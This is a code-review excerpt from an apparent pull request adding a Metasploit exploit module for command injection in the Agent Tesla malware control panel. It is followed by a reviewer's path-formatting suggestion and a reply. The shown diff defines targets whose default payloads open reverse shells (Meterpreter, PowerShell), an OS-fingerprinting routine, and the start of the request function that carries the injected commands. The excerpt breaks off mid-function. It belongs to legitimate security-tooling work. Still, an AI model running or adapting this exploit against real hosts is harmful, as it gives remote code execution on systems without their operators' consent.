modules/exploits/multi/http/agent_tesla_panel_rce.rb

```diff
@@ -0,0 +1,189 @@
+      'Name' => 'Agent Tesla Panel Remote Code Execution',
+      'Description' => %q{
+        This module exploit the command injection vulnerability in control center of the agent Tesla.
+      },
+      'Author' => [
+        'Ege Balcı <ege.balci@invictuseurope.com>', # discovery and independent module
+        'mekhalleh (RAMELLA Sébastien)' # add. targetting windows
+      ],
+      'References' => [
+        ['URL', 'https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources'], # Agent-Tesla WebPanel available for download
+        ['URL', 'https://www.cyber.nj.gov/threat-profiles/trojan-variants/agent-tesla'],
+        ['URL', 'https://krebsonsecurity.com/2018/10/who-is-agent-tesla/']
+      ],
+      'DisclosureDate' => '2018-07-10',
+      'License' => MSF_LICENSE,
+      'Platform' => ['unix', 'windows'],
+      'Arch' => [ARCH_CMD, ARCH_PHP],
+      'Privileged' => true,
+      'Targets' => [
+        ['Automatic (Dropper)',
+          'Platform' => 'php',
+          'Arch' => [ARCH_PHP],
+          'Type' => :php_dropper,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+          }
+        ],
+        ['Unix (In-Memory)',
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_memory,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/generic'
+          }
+        ],
+        ['Windows (In-Memory)',
+          'Platform' => 'windows',
+          'Arch' => ARCH_CMD,
+          'Type' => :windows_memory,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/windows/reverse_powershell'
+          }
+        ],
+      ],
+      'DefaultTarget' => 0,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
+    ])
+  end
+
+  def get_os
+    received = parse_response(execute_command('echo $PATH'))
+    ## Not linux, check Windows.
+    if(received.include?('$PATH'))
+      received = parse_response(execute_command('echo %PATH%'))
+    end
+
+    os = false
+    if(received =~ /^\//)
+      os = 'linux'
+    elsif(received =~ /^[a-zA-Z]:\\/)
+      os = 'windows'
+    end
+
+    return(os)
+  end
+
+  def parse_response(js)
+    if js
+      json = {}
+      begin
+        json = JSON.parse(sanitize_json(js.body))
+        return "#{json['data'][0]['username']}"
+      rescue JSON::ParserError
+      end
+    end
+
+    return false
+  end
+
+  def sanitize_json(js)
+    js.gsub!("},\r\n]", "}]")
+    js.gsub!("'", '"')
+    return js.gsub('", }', '"}')
+  end
+
+  def execute_command(command)
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
```

Comment:
```suggestion
      'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', 'server_processing.php'),
```

Reply:
For the record, the original code is functionally the same. There is no platform-specific path separator, only `/`.